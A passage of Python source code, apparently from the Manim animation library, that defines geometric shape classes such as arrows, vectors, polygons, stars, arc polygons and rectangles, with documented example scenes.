    def reset_normal_vector(self):
        """Resets the normal of a vector"""
        self.normal_vector = self.get_normal_vector()
        return self

    def get_default_tip_length(self) -> float:
        """Returns the default tip_length of the arrow.

        Examples
        --------
        ::

            >>> Arrow().get_default_tip_length()
            0.35
        """
        # The tip may not exceed max_ratio of the arrow's total length.
        max_ratio = self.max_tip_length_to_length_ratio
        return min(self.tip_length, max_ratio * self.get_length())

    def set_stroke_width_from_length(self):
        """Used internally. Sets stroke width based on length."""
        # Cap the stroke width at max_ratio * length so short arrows stay
        # proportionate. The OpenGL and Cairo renderers use different
        # keyword names for "do not recurse into submobjects".
        max_ratio = self.max_stroke_width_to_length_ratio
        if config.renderer == "opengl":
            self.set_stroke(
                width=min(self.initial_stroke_width, max_ratio * self.get_length()),
                recurse=False,
            )
        else:
            self.set_stroke(
                width=min(self.initial_stroke_width, max_ratio * self.get_length()),
                family=False,
            )
        return self
class Vector(Arrow):
    """A vector specialized for use in graphs.

    Parameters
    ----------
    direction : Union[:class:`list`, :class:`numpy.ndarray`]
        The direction of the arrow.
    buff : :class:`float`
        The distance of the vector from its endpoints.
    kwargs : Any
        Additional arguments to be passed to :class:`Arrow`

    Examples
    --------
    .. manim:: VectorExample
        :save_last_frame:

        class VectorExample(Scene):
            def construct(self):
                plane = NumberPlane()
                vector_1 = Vector([1,2])
                vector_2 = Vector([-5,-2])
                self.add(plane, vector_1, vector_2)
    """

    def __init__(self, direction=RIGHT, buff=0, **kwargs):
        self.buff = buff
        # Promote a 2D direction to 3D by appending z = 0.
        if len(direction) == 2:
            direction = np.hstack([direction, 0])

        super().__init__(ORIGIN, direction, buff=buff, **kwargs)

    def coordinate_label(
        self, integer_labels: bool = True, n_dim: int = 2, color: str = WHITE
    ):
        """Creates a label based on the coordinates of the vector.

        Parameters
        ----------
        integer_labels
            Whether or not to round the coordinates to integers.
        n_dim
            The number of dimensions of the vector.
        color
            The color of the label.

        Examples
        --------
        .. manim:: VectorCoordinateLabel
            :save_last_frame:

            class VectorCoordinateLabel(Scene):
                def construct(self):
                    plane = NumberPlane()

                    vect_1 = Vector([1, 2])
                    vect_2 = Vector([-3, -2])
                    label_1 = vect_1.coordinate_label()
                    label_2 = vect_2.coordinate_label(color=YELLOW)

                    self.add(plane, vect_1, vect_2, label_1, label_2)
        """
        # avoiding circular imports
        from .matrix import Matrix

        # Render the endpoint coordinates as a column matrix.
        vect = np.array(self.get_end())
        if integer_labels:
            vect = np.round(vect).astype(int)
        vect = vect[:n_dim]
        vect = vect.reshape((n_dim, 1))
        label = Matrix(vect)
        label.scale(LARGE_BUFF - 0.2)

        # Place the label next to the arrow head, on the outside of the
        # vector (left labels for left-pointing vectors, and vice versa).
        shift_dir = np.array(self.get_end())
        if shift_dir[0] >= 0:  # Pointing right
            shift_dir -= label.get_left() + DEFAULT_MOBJECT_TO_MOBJECT_BUFFER * LEFT
        else:  # Pointing left
            shift_dir -= label.get_right() + DEFAULT_MOBJECT_TO_MOBJECT_BUFFER * RIGHT
        label.shift(shift_dir)
        label.set_color(color)
        return label
class DoubleArrow(Arrow):
    """An arrow with tips on both ends.

    Parameters
    ----------
    args : Any
        Arguments to be passed to :class:`Arrow`.
    kwargs : Any
        Additional arguments to be passed to :class:`Arrow`. ``tip_shape_end``
        is accepted as an alias for Arrow's ``tip_shape``; ``tip_shape_start``
        selects the tip attached to the start of the line.

    Examples
    --------
    .. manim:: DoubleArrowExample
        :save_last_frame:

        from manim.mobject.geometry import ArrowCircleFilledTip

        class DoubleArrowExample(Scene):
            def construct(self):
                circle = Circle(radius=2.0)
                d_arrow = DoubleArrow(start=circle.get_left(), end=circle.get_right())
                d_arrow_2 = DoubleArrow(tip_shape_end=ArrowCircleFilledTip, tip_shape_start=ArrowCircleFilledTip)
                group = Group(Group(circle, d_arrow), d_arrow_2).arrange(UP, buff=1)
                self.add(group)

    .. manim:: DoubleArrowExample2
        :save_last_frame:

        class DoubleArrowExample2(Scene):
            def construct(self):
                box = Square()
                p1 = box.get_left()
                p2 = box.get_right()
                d1 = DoubleArrow(p1, p2, buff=0)
                d2 = DoubleArrow(p1, p2, buff=0, tip_length=0.2, color=YELLOW)
                d3 = DoubleArrow(p1, p2, buff=0, tip_length=0.4, color=BLUE)
                Group(d1, d2, d3).arrange(DOWN)
                self.add(box, d1, d2, d3)

    See Also
    --------
    :class:`ArrowTip`
    :class:`CurvedDoubleArrow`
    """

    def __init__(self, *args, **kwargs):
        # Translate the ``tip_shape_end`` alias into Arrow's ``tip_shape``.
        if "tip_shape_end" in kwargs:
            kwargs["tip_shape"] = kwargs.pop("tip_shape_end")
        start_tip_shape = kwargs.pop("tip_shape_start", ArrowTriangleFilledTip)
        super().__init__(*args, **kwargs)
        # Arrow already attached the end tip; add the one at the start.
        self.add_tip(at_start=True, tip_shape=start_tip_shape)
class CubicBezier(VMobject, metaclass=ConvertToOpenGL):
    """A single cubic Bézier curve defined by two anchors and two handles.

    Example
    -------
    .. manim:: BezierSplineExample
        :save_last_frame:

        class BezierSplineExample(Scene):
            def construct(self):
                p1 = np.array([-3, 1, 0])
                p1b = p1 + [1, 0, 0]
                d1 = Dot(point=p1).set_color(BLUE)
                l1 = Line(p1, p1b)
                p2 = np.array([3, -1, 0])
                p2b = p2 - [1, 0, 0]
                d2 = Dot(point=p2).set_color(RED)
                l2 = Line(p2, p2b)
                bezier = CubicBezier(p1b, p1b + 3 * RIGHT, p2b - 3 * RIGHT, p2b)
                self.add(l1, d1, l2, d2, bezier)
    """

    def __init__(self, start_anchor, start_handle, end_handle, end_anchor, **kwargs):
        super().__init__(**kwargs)
        # The four control points of a cubic Bézier: anchor, two handles,
        # anchor.
        control_points = (start_anchor, start_handle, end_handle, end_anchor)
        self.add_cubic_bezier_curve(*control_points)
class Polygram(VMobject, metaclass=ConvertToOpenGL):
    """A generalized :class:`Polygon`, allowing for disconnected sets of edges.

    Parameters
    ----------
    vertex_groups
        The groups of vertices making up the :class:`Polygram`.

        The first vertex in each group is repeated to close the shape.
        Each point must be 3-dimensional: ``[x,y,z]``
    color
        The color of the :class:`Polygram`.
    kwargs
        Forwarded to the parent constructor.

    Examples
    --------
    .. manim:: PolygramExample

        import numpy as np

        class PolygramExample(Scene):
            def construct(self):
                hexagram = Polygram(
                    [[0, 2, 0], [-np.sqrt(3), -1, 0], [np.sqrt(3), -1, 0]],
                    [[-np.sqrt(3), 1, 0], [0, -2, 0], [np.sqrt(3), 1, 0]],
                )
                self.add(hexagram)

                dot = Dot()
                self.play(MoveAlongPath(dot, hexagram), run_time=5, rate_func=linear)
                self.remove(dot)
                self.wait()
    """

    def __init__(self, *vertex_groups: Iterable[Sequence[float]], color=BLUE, **kwargs):
        super().__init__(color=color, **kwargs)

        # Each vertex group becomes its own sub-path, closed by appending
        # the first vertex again at the end.
        for vertices in vertex_groups:
            first_vertex, *vertices = vertices
            first_vertex = np.array(first_vertex)

            self.start_new_path(first_vertex)
            self.add_points_as_corners(
                [*[np.array(vertex) for vertex in vertices], first_vertex]
            )

    def get_vertices(self) -> np.ndarray:
        """Gets the vertices of the :class:`Polygram`.

        Returns
        -------
        :class:`numpy.ndarray`
            The vertices of the :class:`Polygram`.

        Examples
        --------
        ::

            >>> sq = Square()
            >>> sq.get_vertices()
            array([[ 1.,  1.,  0.],
                   [-1.,  1.,  0.],
                   [-1., -1.,  0.],
                   [ 1., -1.,  0.]])
        """
        return self.get_start_anchors()

    def get_vertex_groups(self) -> np.ndarray:
        """Gets the vertex groups of the :class:`Polygram`.

        Returns
        -------
        :class:`numpy.ndarray`
            The vertex groups of the :class:`Polygram`.

        Examples
        --------
        ::

            >>> poly = Polygram([ORIGIN, RIGHT, UP], [LEFT, LEFT + UP, 2 * LEFT])
            >>> poly.get_vertex_groups()
            array([[[ 0.,  0.,  0.],
                    [ 1.,  0.,  0.],
                    [ 0.,  1.,  0.]],
            <BLANKLINE>
                   [[-1.,  0.,  0.],
                    [-1.,  1.,  0.],
                    [-2.,  0.,  0.]]])
        """
        # A group ends when a segment's end point returns to the group's
        # first vertex (the path was closed in __init__).
        vertex_groups = []

        group = []
        for start, end in zip(self.get_start_anchors(), self.get_end_anchors()):
            group.append(start)

            if self.consider_points_equals(end, group[0]):
                vertex_groups.append(group)
                group = []

        return np.array(vertex_groups)

    def round_corners(self, radius: float = 0.5):
        """Rounds off the corners of the :class:`Polygram`.

        Each corner is replaced by a circular arc of the given radius,
        and consecutive arcs are joined by straight segments.

        Parameters
        ----------
        radius
            The curvature of the corners of the :class:`Polygram`.
            A negative radius produces concave corners.

        Examples
        --------
        .. manim:: PolygramRoundCorners
            :save_last_frame:

            class PolygramRoundCorners(Scene):
                def construct(self):
                    star = Star(outer_radius=2)

                    shapes = VGroup(star)
                    shapes.add(star.copy().round_corners(radius=0.1))
                    shapes.add(star.copy().round_corners(radius=0.25))

                    shapes.arrange(RIGHT)
                    self.add(shapes)

        See Also
        --------
        :class:`RoundedRectangle`
        """
        if radius == 0:
            return self

        new_points = []

        for vertices in self.get_vertex_groups():
            arcs = []
            # Build one arc per corner, spanning the three consecutive
            # vertices that define it.
            for v1, v2, v3 in adjacent_n_tuples(vertices, 3):
                vect1 = v2 - v1
                vect2 = v3 - v2
                unit_vect1 = normalize(vect1)
                unit_vect2 = normalize(vect2)

                angle = angle_between_vectors(vect1, vect2)
                # Negative radius gives concave curves
                angle *= np.sign(radius)

                # Distance between vertex and start of the arc
                cut_off_length = radius * np.tan(angle / 2)

                # Determines counterclockwise vs. clockwise
                sign = np.sign(np.cross(vect1, vect2)[2])

                arc = ArcBetweenPoints(
                    v2 - unit_vect1 * cut_off_length,
                    v2 + unit_vect2 * cut_off_length,
                    angle=sign * angle,
                )
                arcs.append(arc)

            # To ensure that we loop through starting with last
            arcs = [arcs[-1], *arcs[:-1]]
            # Connect each arc to the next with a straight line.
            for arc1, arc2 in adjacent_pairs(arcs):
                new_points.extend(arc1.get_points())

                line = Line(arc1.get_end(), arc2.get_start())

                # Make sure anchors are evenly distributed
                len_ratio = line.get_length() / arc1.get_arc_length()
                line.insert_n_curves(int(arc1.get_num_curves() * len_ratio))

                new_points.extend(line.get_points())

        self.set_points(new_points)

        return self
class Polygon(Polygram):
    """A shape made of a single closed loop of vertices.

    Parameters
    ----------
    vertices
        The vertices of the :class:`Polygon`.
    kwargs
        Forwarded to the parent constructor.

    Examples
    --------
    .. manim:: PolygonExample
        :save_last_frame:

        class PolygonExample(Scene):
            def construct(self):
                isosceles = Polygon([-5, 1.5, 0], [-2, 1.5, 0], [-3.5, -2, 0])
                position_list = [
                    [4, 1, 0],  # middle right
                    [4, -2.5, 0],  # bottom right
                    [0, -2.5, 0],  # bottom left
                    [0, 3, 0],  # top left
                    [2, 1, 0],  # middle
                    [4, 3, 0],  # top right
                ]
                square_and_triangles = Polygon(*position_list, color=PURPLE_B)
                self.add(isosceles, square_and_triangles)
    """

    def __init__(self, *vertices: Sequence[float], **kwargs):
        # A polygon is a polygram with exactly one (closed) vertex group.
        super().__init__(vertices, **kwargs)
class RegularPolygram(Polygram):
    """A :class:`Polygram` with regularly spaced vertices.

    Parameters
    ----------
    num_vertices
        The number of vertices.
    density
        The density of the :class:`RegularPolygram`.

        Can be thought of as how many vertices to hop
        to draw a line between them. Every ``density``-th
        vertex is connected.
    radius
        The radius of the circle that the vertices are placed on.
    start_angle
        The angle the vertices start at; the rotation of
        the :class:`RegularPolygram`.
    kwargs
        Forwarded to the parent constructor.

    Examples
    --------
    .. manim:: RegularPolygramExample
        :save_last_frame:

        class RegularPolygramExample(Scene):
            def construct(self):
                pentagram = RegularPolygram(5, radius=2)
                self.add(pentagram)
    """

    def __init__(
        self,
        num_vertices: int,
        *,
        density: int = 2,
        radius: float = 1,
        start_angle: Optional[float] = None,
        **kwargs,
    ):
        # Regular polygrams can be expressed by the number of their vertices
        # and their density. This relation can be expressed as its Schläfli
        # symbol: {num_vertices/density}.
        #
        # For instance, a pentagon can be expressed as {5/1} or just {5}.
        # A pentagram, however, can be expressed as {5/2}.
        # A hexagram *would* be expressed as {6/2}, except that 6 and 2
        # are not coprime, and it can be simplified to 2{3}, which corresponds
        # to the fact that a hexagram is actually made up of 2 triangles.
        #
        # See https://en.wikipedia.org/wiki/Polygram_(geometry)#Generalized_regular_polygons
        # for more information.

        num_gons = np.gcd(num_vertices, density)
        num_vertices //= num_gons
        density //= num_gons

        # Utility function for generating the individual
        # polygon vertices.
        def gen_polygon_vertices(start_angle):
            reg_vertices, start_angle = regular_vertices(
                num_vertices, radius=radius, start_angle=start_angle
            )

            vertices = []
            i = 0
            # Hop ``density`` vertices at a time; because num_vertices and
            # density are now coprime, this walk visits every vertex exactly
            # once before returning to index 0.
            while True:
                vertices.append(reg_vertices[i])

                i += density
                i %= num_vertices
                if i == 0:
                    break

            return vertices, start_angle

        first_group, self.start_angle = gen_polygon_vertices(start_angle)
        vertex_groups = [first_group]

        # The remaining component polygons are rotated copies of the first,
        # evenly spread over one vertex spacing.
        for i in range(1, num_gons):
            start_angle = self.start_angle + (i / num_gons) * TAU / num_vertices
            group, _ = gen_polygon_vertices(start_angle)

            vertex_groups.append(group)

        super().__init__(*vertex_groups, **kwargs)
class RegularPolygon(RegularPolygram):
    """An n-sided polygon with equal sides and angles.

    Parameters
    ----------
    n
        The number of sides of the :class:`RegularPolygon`.
    kwargs
        Forwarded to the parent constructor.

    Examples
    --------
    .. manim:: RegularPolygonExample
        :save_last_frame:

        class RegularPolygonExample(Scene):
            def construct(self):
                poly_1 = RegularPolygon(n=6)
                poly_2 = RegularPolygon(n=6, start_angle=30*DEGREES, color=GREEN)
                poly_3 = RegularPolygon(n=10, color=RED)

                poly_group = Group(poly_1, poly_2, poly_3).scale(1.5).arrange(buff=1)
                self.add(poly_group)
    """

    def __init__(self, n: int = 6, **kwargs):
        # A regular polygon is a regular polygram of density 1.
        super().__init__(n, density=1, **kwargs)
class Star(Polygon):
    """A regular polygram without the intersecting lines.

    Parameters
    ----------
    n
        How many points on the :class:`Star`.
    outer_radius
        The radius of the circle that the outer vertices are placed on.
    inner_radius
        The radius of the circle that the inner vertices are placed on.

        If unspecified, the inner radius will be
        calculated such that the edges of the :class:`Star`
        perfectly follow the edges of its :class:`RegularPolygram`
        counterpart.
    density
        The density of the :class:`Star`. Only used if
        ``inner_radius`` is unspecified.

        See :class:`RegularPolygram` for more information.
    start_angle
        The angle the vertices start at; the rotation of
        the :class:`Star`.
    kwargs
        Forwarded to the parent constructor.

    Raises
    ------
    :exc:`ValueError`
        If ``inner_radius`` is unspecified and ``density``
        is not in the range ``[1, n/2)``.

    Examples
    --------
    .. manim:: StarExample
        :save_as_gif:

        class StarExample(Scene):
            def construct(self):
                pentagram = RegularPolygram(5, radius=2)
                star = Star(outer_radius=2, color=RED)

                self.add(pentagram)
                self.play(Create(star), run_time=3)
                self.play(FadeOut(star), run_time=2)

    .. manim:: DifferentDensitiesExample
        :save_last_frame:

        class DifferentDensitiesExample(Scene):
            def construct(self):
                density_2 = Star(7, outer_radius=2, density=2, color=RED)
                density_3 = Star(7, outer_radius=2, density=3, color=PURPLE)

                self.add(VGroup(density_2, density_3).arrange(RIGHT))
    """

    def __init__(
        self,
        n: int = 5,
        *,
        outer_radius: float = 1,
        inner_radius: Optional[float] = None,
        density: int = 2,
        start_angle: Optional[float] = TAU / 4,
        **kwargs,
    ):
        # Angular offset between an outer vertex and its neighboring inner
        # vertex.
        inner_angle = TAU / (2 * n)

        if inner_radius is None:
            # See https://math.stackexchange.com/a/2136292 for an
            # overview of how to calculate the inner radius of a
            # perfect star.

            if density <= 0 or density >= n / 2:
                raise ValueError(
                    f"Incompatible density {density} for number of points {n}"
                )

            outer_angle = TAU * density / n
            inverse_x = 1 - np.tan(inner_angle) * (
                (np.cos(outer_angle) - 1) / np.sin(outer_angle)
            )

            inner_radius = outer_radius / (np.cos(inner_angle) * inverse_x)

        outer_vertices, self.start_angle = regular_vertices(
            n, radius=outer_radius, start_angle=start_angle
        )
        inner_vertices, _ = regular_vertices(
            n, radius=inner_radius, start_angle=self.start_angle + inner_angle
        )

        # Interleave outer and inner vertices so the polygon alternates
        # between the two circles.
        vertices = []
        for pair in zip(outer_vertices, inner_vertices):
            vertices.extend(pair)

        super().__init__(*vertices, **kwargs)
class ArcPolygon(VMobject, metaclass=ConvertToOpenGL):
    """A generalized polygon allowing for points to be connected with arcs.

    This version tries to stick close to the way :class:`Polygon` is used. Points
    can be passed to it directly which are used to generate the according arcs
    (using :class:`ArcBetweenPoints`). An angle or radius can be passed to it to
    use across all arcs, but to configure arcs individually an ``arc_config`` list
    has to be passed with the syntax explained below.

    .. tip::

        Two instances of :class:`ArcPolygon` can be transformed properly into one
        another as well. Be advised that any arc initialized with ``angle=0``
        will actually be a straight line, so if a straight section should seamlessly
        transform into an arced section or vice versa, initialize the straight section
        with a negligible angle instead (such as ``angle=0.0001``).

    There is an alternative version (:class:`ArcPolygonFromArcs`) that is instantiated
    with pre-defined arcs.

    See Also
    --------
    :class:`ArcPolygonFromArcs`

    Parameters
    ----------
    vertices : Union[:class:`list`, :class:`np.array`]
        A list of vertices, start and end points for the arc segments.
    angle : :class:`float`
        The angle used for constructing the arcs. If no other parameters
        are set, this angle is used to construct all arcs.
    radius : Optional[:class:`float`]
        The circle radius used to construct the arcs. If specified,
        overrides the specified ``angle``.
    arc_config : Optional[Union[List[:class:`dict`]], :class:`dict`]
        When passing a ``dict``, its content will be passed as keyword
        arguments to :class:`~.ArcBetweenPoints`. Otherwise, a list
        of dictionaries containing values that are passed as keyword
        arguments for every individual arc can be passed.
    kwargs
        Further keyword arguments that are passed to the constructor of
        :class:`~.VMobject`.

    Raises
    ------
    :exc:`ValueError`
        If ``arc_config`` is a list whose length does not match the
        number of vertices.

    Attributes
    ----------
    arcs : :class:`list`
        The arcs created from the input parameters::

            >>> from manim import ArcPolygon
            >>> ap = ArcPolygon([0, 0, 0], [2, 0, 0], [0, 2, 0])
            >>> ap.arcs
            [ArcBetweenPoints, ArcBetweenPoints, ArcBetweenPoints]

    Examples
    --------
    .. manim:: SeveralArcPolygons

        class SeveralArcPolygons(Scene):
            def construct(self):
                a = [0, 0, 0]
                b = [2, 0, 0]
                c = [0, 2, 0]
                ap1 = ArcPolygon(a, b, c, radius=2)
                ap2 = ArcPolygon(a, b, c, angle=45*DEGREES)
                ap3 = ArcPolygon(a, b, c, arc_config={'radius': 1.7, 'color': RED})
                ap4 = ArcPolygon(a, b, c, color=RED, fill_opacity=1,
                                            arc_config=[{'radius': 1.7, 'color': RED},
                                            {'angle': 20*DEGREES, 'color': BLUE},
                                            {'radius': 1}])
                ap_group = VGroup(ap1, ap2, ap3, ap4).arrange()
                self.play(*[Create(ap) for ap in [ap1, ap2, ap3, ap4]])
                self.wait()

    For further examples see :class:`ArcPolygonFromArcs`.
    """

    def __init__(self, *vertices, angle=PI / 4, radius=None, arc_config=None, **kwargs):
        n = len(vertices)
        # Consecutive vertex pairs, wrapping around to close the polygon.
        point_pairs = [(vertices[k], vertices[(k + 1) % n]) for k in range(n)]

        # Normalize the three accepted arc_config forms into one config
        # dict per arc.
        if not arc_config:
            if radius:
                all_arc_configs = [{"radius": radius} for pair in point_pairs]
            else:
                all_arc_configs = [{"angle": angle} for pair in point_pairs]
        elif isinstance(arc_config, dict):
            all_arc_configs = [arc_config for pair in point_pairs]
        else:
            # This used to be a bare ``assert``, which is stripped under
            # ``python -O`` and gives an uninformative error; validate
            # explicitly instead.
            if len(arc_config) != n:
                raise ValueError(
                    f"arc_config must contain one dict per vertex "
                    f"(expected {n}, got {len(arc_config)})"
                )
            all_arc_configs = arc_config

        arcs = [
            ArcBetweenPoints(*pair, **conf)
            for (pair, conf) in zip(point_pairs, all_arc_configs)
        ]

        super().__init__(**kwargs)
        # Adding the arcs like this makes ArcPolygon double as a VGroup.
        # Also makes changes to the ArcPolygon, such as scaling, affect
        # the arcs, so that their new values are usable.
        self.add(*arcs)
        for arc in arcs:
            self.append_points(arc.get_points())

        # This enables the use of ArcPolygon.arcs as a convenience
        # because ArcPolygon[0] returns itself, not the first Arc.
        self.arcs = arcs
class ArcPolygonFromArcs(VMobject, metaclass=ConvertToOpenGL):
    """A generalized polygon allowing for points to be connected with arcs.

    This version takes in pre-defined arcs to generate the arcpolygon and introduces
    little new syntax. However unlike :class:`Polygon` it can't be created with points
    directly.

    For proper appearance the passed arcs should connect seamlessly:
    ``[a,b][b,c][c,a]``

    If there are any gaps between the arcs, those will be filled in
    with straight lines, which can be used deliberately for any straight
    sections. Arcs can also be passed as straight lines such as an arc
    initialized with ``angle=0``.

    .. tip::

        Two instances of :class:`ArcPolygon` can be transformed properly into
        one another as well. Be advised that any arc initialized with ``angle=0``
        will actually be a straight line, so if a straight section should seamlessly
        transform into an arced section or vice versa, initialize the straight
        section with a negligible angle instead (such as ``angle=0.0001``).

    There is an alternative version (:class:`ArcPolygon`) that can be instantiated
    with points.

    See Also
    --------
    :class:`ArcPolygon`

    Parameters
    ----------
    arcs : Union[:class:`Arc`, :class:`ArcBetweenPoints`]
        These are the arcs from which the arcpolygon is assembled.
    kwargs
        Keyword arguments that are passed to the constructor of
        :class:`~.VMobject`. Affects how the ArcPolygon itself is drawn,
        but doesn't affect passed arcs.

    Raises
    ------
    :exc:`ValueError`
        If any passed mobject is not an :class:`Arc` or
        :class:`ArcBetweenPoints`.

    Attributes
    ----------
    arcs : :class:`list`
        The arcs used to initialize the ArcPolygonFromArcs::

            >>> from manim import ArcPolygonFromArcs, Arc, ArcBetweenPoints
            >>> ap = ArcPolygonFromArcs(Arc(), ArcBetweenPoints([1,0,0], [0,1,0]), Arc())
            >>> ap.arcs
            [Arc, ArcBetweenPoints, Arc]

    Examples
    --------
    One example of an arcpolygon is the Reuleaux triangle.
    Instead of 3 straight lines connecting the outer points,
    a Reuleaux triangle has 3 arcs connecting those points,
    making a shape with constant width.

    Passed arcs are stored as submobjects in the arcpolygon.
    This means that the arcs are changed along with the arcpolygon,
    for example when it's shifted, and these arcs can be manipulated
    after the arcpolygon has been initialized.

    Also both the arcs contained in an :class:`~.ArcPolygonFromArcs`, as well as the
    arcpolygon itself are drawn, which affects draw time in :class:`~.Create`
    for example. In most cases the arcs themselves don't
    need to be drawn, in which case they can be passed as invisible.

    .. manim:: ArcPolygonExample

        class ArcPolygonExample(Scene):
            def construct(self):
                arc_conf = {"stroke_width": 0}
                poly_conf = {"stroke_width": 10, "stroke_color": BLUE,
                      "fill_opacity": 1, "color": PURPLE}
                a = [-1, 0, 0]
                b = [1, 0, 0]
                c = [0, np.sqrt(3), 0]
                arc0 = ArcBetweenPoints(a, b, radius=2, **arc_conf)
                arc1 = ArcBetweenPoints(b, c, radius=2, **arc_conf)
                arc2 = ArcBetweenPoints(c, a, radius=2, **arc_conf)
                reuleaux_tri = ArcPolygonFromArcs(arc0, arc1, arc2, **poly_conf)
                self.play(FadeIn(reuleaux_tri))
                self.wait(2)

    The arcpolygon itself can also be hidden so that instead only the contained
    arcs are drawn. This can be used to easily debug arcs or to highlight them.

    .. manim:: ArcPolygonExample2

        class ArcPolygonExample2(Scene):
            def construct(self):
                arc_conf = {"stroke_width": 3, "stroke_color": BLUE,
                    "fill_opacity": 0.5, "color": GREEN}
                poly_conf = {"color": None}
                a = [-1, 0, 0]
                b = [1, 0, 0]
                c = [0, np.sqrt(3), 0]
                arc0 = ArcBetweenPoints(a, b, radius=2, **arc_conf)
                arc1 = ArcBetweenPoints(b, c, radius=2, **arc_conf)
                arc2 = ArcBetweenPoints(c, a, radius=2, stroke_color=RED)
                reuleaux_tri = ArcPolygonFromArcs(arc0, arc1, arc2, **poly_conf)
                self.play(FadeIn(reuleaux_tri))
                self.wait(2)
    """

    def __init__(self, *arcs, **kwargs):
        if not all(isinstance(m, (Arc, ArcBetweenPoints)) for m in arcs):
            raise ValueError(
                "All ArcPolygon submobjects must be of type Arc/ArcBetweenPoints"
            )

        super().__init__(**kwargs)
        # Adding the arcs like this makes ArcPolygonFromArcs double as a VGroup.
        # Also makes changes to the ArcPolygonFromArcs, such as scaling, affect
        # the arcs, so that their new values are usable.
        self.add(*arcs)
        # This enables the use of ArcPolygonFromArcs.arcs as a convenience
        # because ArcPolygonFromArcs[0] returns itself, not the first Arc.
        self.arcs = [*arcs]

        # Copy each arc's points into this mobject, bridging any gap to the
        # next arc with a straight line.
        for arc1, arc2 in adjacent_pairs(arcs):
            self.append_points(arc1.points)
            line = Line(arc1.get_end(), arc2.get_start())
            len_ratio = line.get_length() / arc1.get_arc_length()

            # Guard against degenerate (zero-length) arcs, where the ratio
            # is NaN or infinite; skip the bridging line in that case.
            if math.isnan(len_ratio) or math.isinf(len_ratio):
                continue

            # Insert curves so anchors stay evenly distributed along the line.
            line.insert_n_curves(int(arc1.get_num_curves() * len_ratio))
            self.append_points(line.get_points())
class Triangle(RegularPolygon):
    """An equilateral triangle.

    Parameters
    ----------
    kwargs : Any
        Additional arguments to be passed to :class:`RegularPolygon`.

    Examples
    --------
    .. manim:: TriangleExample
        :save_last_frame:

        class TriangleExample(Scene):
            def construct(self):
                triangle_1 = Triangle()
                triangle_2 = Triangle().scale(2).rotate(60*DEGREES)
                tri_group = Group(triangle_1, triangle_2).arrange(buff=1)
                self.add(tri_group)
    """

    def __init__(self, **kwargs):
        # An equilateral triangle is simply the three-sided regular polygon.
        super().__init__(n=3, **kwargs)
class Rectangle(Polygon):
    """A quadrilateral with two sets of parallel sides.

    Parameters
    ----------
    color : :class:`~.Colors`, optional
        The color of the rectangle.
    height : :class:`float`, optional
        The vertical height of the rectangle.
    width : :class:`float`, optional
        The horizontal width of the rectangle.
    grid_xstep : :class:`float`, optional
        Space between vertical grid lines.
    grid_ystep : :class:`float`, optional
        Space between horizontal grid lines.
    mark_paths_closed : :class:`bool`, optional
        No purpose.
    close_new_points : :class:`bool`, optional
        No purpose.
    kwargs : Any
        Additional arguments to be passed to :class:`Polygon`.

    Examples
    --------
    .. manim:: RectangleExample
        :save_last_frame:

        class RectangleExample(Scene):
            def construct(self):
                rect1 = Rectangle(width=4.0, height=2.0, grid_xstep=1.0, grid_ystep=0.5)
                rect2 = Rectangle(width=1.0, height=4.0)
                rects = Group(rect1,rect2).arrange(buff=1)
                self.add(rects)
    """

    def __init__(
        self,
        color: Color = WHITE,
        height: float = 2.0,
        width: float = 4.0,
        grid_xstep: Optional[float] = None,
        grid_ystep: Optional[float] = None,
        mark_paths_closed=True,
        close_new_points=True,
        **kwargs,
    ):
        # Start from a unit square (corners UR, UL, DL, DR) and stretch it
        # to the requested dimensions.
        super().__init__(UR, UL, DL, DR, color=color, **kwargs)
        self.stretch_to_fit_width(width)
        self.stretch_to_fit_height(height)
        v = self.get_vertices()

        # Optional internal grid: vertical lines stepping right from the
        # upper-left corner (v[1]), and horizontal lines stepping down.
        if grid_xstep is not None:
            grid_xstep = abs(grid_xstep)
            count = int(width / grid_xstep)
            vertical_lines = []
            for i in range(1, count):
                top = v[1] + i * grid_xstep * RIGHT
                vertical_lines.append(Line(top, top + height * DOWN, color=color))
            self.add(VGroup(*vertical_lines))

        if grid_ystep is not None:
            grid_ystep = abs(grid_ystep)
            count = int(height / grid_ystep)
            horizontal_lines = []
            for i in range(1, count):
                left = v[1] + i * grid_ystep * DOWN
                horizontal_lines.append(Line(left, left + width * RIGHT, color=color))
            self.add(VGroup(*horizontal_lines))
class Square(Rectangle):
    """A rectangle whose width and height coincide.

    Parameters
    ----------
    side_length : :class:`float`, optional
        Length of each side of the square.
    kwargs : Any
        Forwarded to the :class:`Rectangle` constructor.

    Examples
    --------
    .. manim:: SquareExample
        :save_last_frame:

        class SquareExample(Scene):
            def construct(self):
                square_1 = Square(side_length=2.0).shift(DOWN)
                square_2 = Square(side_length=1.0).next_to(square_1, direction=UP)
                square_3 = Square(side_length=0.5).next_to(square_2, direction=UP)
                self.add(square_1, square_2, square_3)
    """

    def __init__(self, side_length=2.0, **kwargs):
        # Record the side length before delegating so the attribute exists
        # for the whole lifetime of the object.
        self.side_length = side_length
        super().__init__(height=side_length, width=side_length, **kwargs)
class RoundedRectangle(Rectangle):
    """A rectangle whose corners are rounded off with circular arcs.

    Parameters
    ----------
    corner_radius : :class:`float`, optional
        Radius of the arcs used for the corners.
    kwargs : Any
        Forwarded to the :class:`Rectangle` constructor.

    Examples
    --------
    .. manim:: RoundedRectangleExample
        :save_last_frame:

        class RoundedRectangleExample(Scene):
            def construct(self):
                rect_1 = RoundedRectangle(corner_radius=0.5)
                rect_2 = RoundedRectangle(corner_radius=1.5, height=4.0, width=4.0)
                rect_group = Group(rect_1, rect_2).arrange(buff=1)
                self.add(rect_group)
    """

    def __init__(self, corner_radius=0.5, **kwargs):
        self.corner_radius = corner_radius
        # Build the plain rectangle first, then round its corners in place.
        super().__init__(**kwargs)
        self.round_corners(self.corner_radius)
class ArrowTip(VMobject, metaclass=ConvertToOpenGL):
    r"""Base class for arrow tips.
    See Also
    --------
    :class:`ArrowTriangleTip`
    :class:`ArrowTriangleFilledTip`
    :class:`ArrowCircleTip`
    :class:`ArrowCircleFilledTip`
    :class:`ArrowSquareTip`
    :class:`ArrowSquareFilledTip`
    Examples
    --------
    Cannot be used directly, only intended for inheritance::
        >>> tip = ArrowTip()
        Traceback (most recent call last):
        ...
        NotImplementedError: Has to be implemented in inheriting subclasses.
    Instead, use one of the pre-defined ones, or make
    a custom one like this:
    .. manim:: CustomTipExample
        >>> class MyCustomArrowTip(ArrowTip, RegularPolygon):
        ...     def __init__(self, length=0.35, **kwargs):
        ...         RegularPolygon.__init__(self, n=5, **kwargs)
        ...         self.width = length
        ...         self.stretch_to_fit_height(length)
        >>> arr = Arrow(np.array([-2, -2, 0]), np.array([2, 2, 0]),
